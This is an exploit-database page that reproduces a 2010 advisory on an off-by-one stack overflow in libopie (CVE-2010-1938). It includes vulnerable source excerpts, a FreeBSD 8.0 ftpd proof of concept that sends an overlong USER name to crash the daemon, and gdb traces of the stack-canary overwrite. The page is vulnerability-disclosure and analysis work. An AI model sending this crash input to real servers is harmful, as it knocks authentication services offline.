Exploitalert - Database of Exploits

libopie __readrec() off-by one (FreeBSD ftpd remote PoC)

CVE	Category	Price	Severity
CVE-2010-1938	CWE-193	N/A	N/A

Author	Risk	Exploitation Type	Date
N/A	High	Remote	2010-05-30

CVSS	EPSS	EPSSP
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H	0.6	0.8

CVSS vector description

Metric	Value	Metric Description	Value Description
Attack vector	Network	AV	The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity	High	AC	The successful attack depends on the evasion or circumvention of security-enhancing techniques in place that would otherwise hinder the attack. These include: Evasion of exploit mitigation techniques. The attacker must have additional methods available to bypass security measures in place. For example, circumvention of address space randomization (ASLR) or data execution prevention must be performed for the attack to be successful. Obtaining target-specific secrets. The attacker must gather some target-specific secret before the attack can be successful. A secret is any piece of information that cannot be obtained through any amount of reconnaissance. To obtain the secret the attacker must perform additional attacks or break otherwise secure measures (e.g. knowledge of a secret key may be needed to break a crypto channel). This operation must be performed for each attacked target.
Privileges Required	None	PR	The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction	None	UI	The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope	Unchanged	S	An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality	High	C	There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity	High	I	There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability	High	A	There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.

http://cxsecurity.com/ascii/WLB-2010050285

[ libopie __readrec() off-by one (FreeBSD ftpd remote PoC) ] Authors: - Maksymilian Arciemowicz - Adam 'pi3' Zabrocki Date: - Dis.: 04.05.2010 - Pub.: 27.05.2010 CVE: CVE-2010-1938 CWE: CWE-193 Affected Software: - OPIE Authentication System ( libopie ) Software which use libopie: - OpenSuSE - wu-ftpd - mod_opie - PAM - openssh (modified by FreeBSD/DragonflyBSD Team) - sudo - opiesu - popper - Probably much more... PoC: - FreeBSD 8.0 ftpd(8) Remote Off-by one line FreeBSD 7 is not affected Other software can be also affected. NOTE: Prior versions may also be affected. Orginal URL: http://securityreason.com/achievement_securityalert/87 --- 0.Description --- OPIE is a freely redistributable kit that will drop into most *IX systems and replaces your login and FTP daemon with versions that use OTP for user authentication. It also includes an OTP generator and a library to make it easy to add OTP authentication to existing clients and servers. --- 1. OPIE Authentication System Off-by one --- Libopie allows REMOTE and LOCAL attackers to off-by-one attack (on the stack). Let's look in the code: "/src/contrib/opie/opie.h" /* Maximum length of a principal (read: user name) */ #define OPIE_PRINCIPAL_MAX 32 "./src/contrib/opie/libopie/readrec.c" int __opiereadrec FUNCTION((opie), struct opie *opie) { ... ... { char *c, principal[OPIE_PRINCIPAL_MAX]; int i; if (c = strchr(opie->opie_principal, ':')) *c = 0; [1] if (strlen(opie->opie_principal) > OPIE_PRINCIPAL_MAX) [2] (opie->opie_principal)[OPIE_PRINCIPAL_MAX] = 0; [3] strcpy(principal, opie->opie_principal); ... ... } ... ... ret: if (f) fclose(f); return rval; } This function at [1] check the length of the variable 'opie->opie_principal' which is full user controled. If this length is bigger than OPIE_PRINCIPAL_MAX- 32 bytes, program will write at this position NULL byte. In fact the string will be 32 bytes long. Vulnerability exists at line [3]. Function strcpy() copy user controled variable which can be maximum 32 bytes long, to the local bufor 'principal' which is 32 bytes long too. Here is off-by-one bug because function strcpy() after copied 32 bytes alwyas ADD NULL byte to the and of string. In fact it will be at the position *(principal+32) which is out of buffer. A possible way to exploit this vulnerability: "./src/contrib/opie/libopie/lookup.c" int opielookup FUNCTION((opie, principal), struct opie *opie AND char *principal) { int i; memset(opie, 0, sizeof(struct opie)); opie->opie_principal = principal; if (i = __opiereadrec(opie)) <=== our call ;) return i; return (opie->opie_flags & __OPIE_FLAGS_RW) ? 0 : 2; } a deeper analyzis of the code shows: "./src/contrib/opie/libopie/challenge.c" int opiechallenge FUNCTION((mp, name, ss), struct opie *mp AND char *name AND char *ss) { int rval = -1; rval = opielookup(mp, name); ... ... return rval; } This function is really intereting because it is responsible for authentication so this vulnerability can be in the pre-auth phase. We can found many softwares which use this function for authorization (for example default ftp daemon in FreeBSD) ;) Another interesting call we can find here: "./src/contrib/opie/libopie/writerec.c" int __opiewriterec FUNCTION((opie), struct opie *opie) { char buf[17], buf2[64]; time_t now; FILE *f, *f2 = NULL; int i = 0; char *c; time(&now); if (strftime(buf2, sizeof(buf2), " %b %d,%Y %T", localtime(&now)) < 1) return -1; if (!(opie->opie_flags & __OPIE_FLAGS_READ)) { struct opie opie2; i = opielookup(&opie2, opie->opie_principal); <========== our call :) ... } ... ... } and this function is used in many places: "./src/contrib/opie/libopie/passwd.c" <=== in function opiepasswd() "./src/contrib/opie/libopie/verify.c" <=== in function opieverify() - two times ;) ... so we have got many entry points ;) But we are going to test calls to function opiechallenge(). Pre-auth vulnerability sounds impressive ;) At first let's test default FTP daemon for FreeBSD 8.0 ... --- 2. FreeBSD 8.0 ftpd remote off-by one --- Authentication module for FTP server in FreeBSD 8 module was modified. By default it uses OPIE library. Let`s see http://www.freebsd.org/cgi/cvsweb.cgi/~checkout~/src/libexec/ftpd/ftpd.c?rev=1.214.2.1.2.1;content-type=text%2Fplain ... if (opiechallenge(&opiedata, name, opieprompt) == 0) { pwok = (pw != NULL) && opieaccessfile(remotehost) && opiealways(pw->pw_dir); reply(331, "Response to %s %s for %s.", opieprompt, pwok ? "requested" : "required", name); } else { pwok = 1; reply(331, "Password required for %s.", name); } askpasswd = 1; ... this code has been added in line 8. 7.3 is not affected! Variable 'name' is user name, defined in in auth "USER AAAA" name=AAAA If we use more that 31 chars for username, ftpd will crash. The problem will be casued by the off-by-one bug in libopie. FreeBSD 8.0 compile most of its binaries with -fstack-protector-all flag by default so the FTP server will be killed by SSP with an information about attack: "stack overflow detected" The problematic part of libopie is called by the FTP server via this line: opiechallenge(&opiedata, name, opieprompt) PoC0: Connected to localhost. Escape character is '^]'. 220 127.cx FTP server (Version 6.00LS) ready. user cx 331 Password required for cx. user AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Connection closed by foreign host. 127# #0 0x281efde7 in kill () from /lib/libc.so.7 (gdb) i r eax 0x0 0 ecx 0x8060f50 134614864 edx 0x0 0 ebx 0x28205ad8 673209048 esp 0xbfbfd84c 0xbfbfd84c ebp 0xbfbfd898 0xbfbfd898 esi 0xbfbfd864 -1077946268 edi 0x281f3ad0 673135312 eip 0x281efde7 0x281efde7 eflags 0x246 582 cs 0x33 51 ss 0x3b 59 ds 0x3b 59 es 0x3b 59 fs 0x3b 59 gs 0x1b 27 (gdb) bt #0 0x281efde7 in kill () from /lib/libc.so.7 #1 0x2812de12 in brk () from /lib/libc.so.7 #2 0x00000580 in ?? () #3 0x00000006 in ?? () #4 0x00000000 in ?? () #5 0x281da06f in __srget () from /lib/libc.so.7 #6 0x280d0367 in __opieopen () from /usr/lib/libopie.so.6 #7 0x280cff4f in __opiereadrec () from /usr/lib/libopie.so.6 #8 0x280cfb53 in opielookup () from /usr/lib/libopie.so.6 #9 0x280cea9c in opiechallenge () from /usr/lib/libopie.so.6 #10 0x0804de32 in ?? () #11 0x0805fa60 in optind () #12 0x283250a0 in ?? () #13 0x0805fb78 in optind () #14 0x2809d000 in ?? () #15 0x00000548 in ?? () #16 0x00000000 in ?? () #17 0x2817658b in free () from /lib/libc.so.7 #18 0x080546e1 in getline () ... n ?? () #320 0x0000000f in ?? () #321 <signal handler called> Cannot access memory at address 0x4c FTP daemon crashed with this log: May 13 10:57:40 127 ftpd[1547]: stack overflow detected; terminated May 13 10:57:41 127 kernel: pid 1547 (ftpd), uid 0: exited on signal 6 (core dumped) May 13 10:59:35 127 ftpd[1556]: stack overflow detected; terminated May 13 10:59:35 127 kernel: pid 1556 (ftpd), uid 0: exited on signal 6 (core dumped) SSP has detected stack oveerflow. Let's analyze deeper what has exactly happened: pi3-freebsd# gdb -q --pid=35118 ... ... Loaded symbols for /libexec/ld-elf.so.1 0x281f3271 in read () from /lib/libc.so.7 (gdb) b __opiereadrec Breakpoint 1 at 0x280cfd74 (gdb) c Continuing. Breakpoint 1, 0x280cfd74 in __opiereadrec () from /usr/lib/libopie.so.6 (gdb) x/20i $eip ... ... 0x280cfe23 <__opiereadrec+179>: call 0x280cce48 <_init+1428> <== strlen(...) 0x280cfe28 <__opiereadrec+184>: cmp $0x20,%eax 0x280cfe2b <__opiereadrec+187>: ja 0x280cfefb <__opiereadrec+395> <= if > 0x20... ... ... 0x280cfe31 <__opiereadrec+193>: lea 0xffffffd0(%ebp),%eax 0x280cfe34 <__opiereadrec+196>: mov %edi,0x4(%esp) 0x280cfe38 <__opiereadrec+200>: lea 0x4(%esi),%edi 0x280cfe3b <__opiereadrec+203>: mov %eax,0xffffffb8(%ebp) 0x280cfe3e <__opiereadrec+206>: mov %eax,(%esp) 0x280cfe41 <__opiereadrec+209>: call 0x280cce98 <_init+1508> <== strcpy(principal,opie->opie_principal); 0x280cfe46 <__opiereadrec+214>: mov 0xffffffc0(%ebp),%edx ... ... 0x280cfeab <__opiereadrec+315>: mov 0x194(%ebx),%ecx <=== get canary from the 'secret' place 0x280cfeb1 <__opiereadrec+321>: mov %edi,%eax 0x280cfeb3 <__opiereadrec+323>: mov 0xfffffff0(%ebp),%edx <== get canary from the stack 0x280cfeb6 <__opiereadrec+326>: xor (%ecx),%edx <== compare it (xor) 0x280cfeb8 <__opiereadrec+328>: jne 0x280cff4a <__opiereadrec+474> <== __stack 0x280cfebe <__opiereadrec+334>: add $0x4c,%esp 0x280cfec1 <__opiereadrec+337>: pop %ebx 0x280cfec2 <__opiereadrec+338>: pop %esi 0x280cfec3 <__opiereadrec+339>: pop %edi 0x280cfec4 <__opiereadrec+340>: pop %ebp 0x280cfec5 <__opiereadrec+341>: ret ... ... 0x280cfefb <__opiereadrec+395>: movb $0x0,0x20(%edi) <=== (opie->opie_principal)[OPIE_PRINCIPAL_MAX] = 0; 0x280cfeff <__opiereadrec+399>: mov 0x104(%esi),%edi 0x280cff05 <__opiereadrec+405>: jmp 0x280cfe31 <__opiereadrec+193> ... ... (gdb) x/x $ebx+0x194 0x280d3940 <remote_terms+8856>: 0x0805e900 (gdb) x/x 0x0805e900 0x805e900 <__stack_chk_guard>: 0x4541c442 <== secret canary ;) (gdb) x/x $ebp+0xfffffff0 0xbfbfdce8: 0x00000000 (gdb) b *0x280cfe28 Breakpoint 2 at 0x280cfe28 (gdb) c Continuing. Breakpoint 2, 0x280cfe28 in __opiereadrec () from /usr/lib/libopie.so.6 (gdb) i r eax eax 0x22 34 <=== strlen() return value... (gdb) b *0x280cfefb Breakpoint 3 at 0x280cfefb (gdb) c Continuing. Breakpoint 3, 0x280cfefb in __opiereadrec () from /usr/lib/libopie.so.6 (gdb) x/s $edi 0x28325070: 'A' <repeats 31 times>, "\001\002\b" (gdb) b *0x280cfeff Breakpoint 4 at 0x280cfeff (gdb) c Continuing. Breakpoint 4, 0x280cfeff in __opiereadrec () from /usr/lib/libopie.so.6 (gdb) x/s $edi 0x28325070: 'A' <repeats 31 times>, "\001" <== as we can see in this string (array) 33 byte now is 0x0. So our buffer now holds/contains 32 bytes before the terminating NULL byte (gdb) b *0x280cfe41 Breakpoint 5 at 0x280cfe41 (gdb) c Continuing. Breakpoint 5, 0x280cfe41 in __opiereadrec () from /usr/lib/libopie.so.6 (gdb) x/x $esp 0xbfbfdca0: 0xbfbfdcc8 (gdb) x/x $esp+4 0xbfbfdca4: 0x28325070 (gdb) x/s 0x28325070 0x28325070: 'A' <repeats 31 times>, "\001" (gdb) x/20x 0xbfbfdcc8 <====== Local buffer 0xbfbfdcc8: 0x280d37ac 0x0805fa60 0x28325070 0xbfbfdd18 0xbfbfdcd8: 0x2805f629 0x2809d600 0x00000060 0x00000000 0xbfbfdce8: 0x4541c442 0x280d37ac 0x0805fa60 0x28325070 ^^^^^^^^^^ <============ canary value before strcpy() 0xbfbfdcf8: 0xbfbfdd18 0x280cfb53 0x0805fa60 0x00000000 0xbfbfdd08: 0x00000118 0x0805fa60 0x280d37ac 0x00000000 (gdb) b *0x280cfe46 Breakpoint 6 at 0x280cfe46 (gdb) c Continuing. Breakpoint 6, 0x280cfe46 in __opiereadrec () from /usr/lib/libopie.so.6 (gdb) x/20x 0xbfbfdcc8 0xbfbfdcc8: 0x41414141 0x41414141 0x41414141 0x41414141 0xbfbfdcd8: 0x41414141 0x41414141 0x41414141 0x01414141 0xbfbfdce8: 0x4541c400 0x280d37ac 0x0805fa60 0x28325070 ^^^^^^^^^^ <============== canary value after strcpy(). Now we can see pretty off-by-one... ;) 0xbfbfdcf8: 0xbfbfdd18 0x280cfb53 0x0805fa60 0x00000000 0xbfbfdd08: 0x00000118 0x0805fa60 0x280d37ac 0x00000000 (gdb) b *0x280cfeb8 Breakpoint 7 at 0x280cfeb8 (gdb) c Continuing. Breakpoint 7, 0x280cfeb8 in __opiereadrec () from /usr/lib/libopie.so.6 (gdb) x/x $ecx 0x805e900 <__stack_chk_guard>: 0x4541c442 (gdb) x/x $ebp+0xfffffff0 0xbfbfdce8: 0x4541c400 (gdb) b *0x280cfec5 Breakpoint 8 at 0x280cfec5 (gdb) c Continuing. May 14 01:55:03 pi3-freebsd ftpd[35118]: stack overflow detected; terminated Program received signal SIGABRT, Aborted. 0x281efde7 in kill () from /lib/libc.so.7 (gdb) --- 3. Credits --- Discovered by: - Maksymilian Arciemowicz from SecurityReason.com - Adam Zabrocki from ... hm... good question ;p --- 4. Greets --- sp3x Infospec p_e_a, #plhack@IRCNET --- 5. Contact --- Email: - cxib {a\./t] securityreason [d=t} com - pi3 [a{]t] itsec D||T pl --- 6. Official FreeBSD response --- http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc

Impressum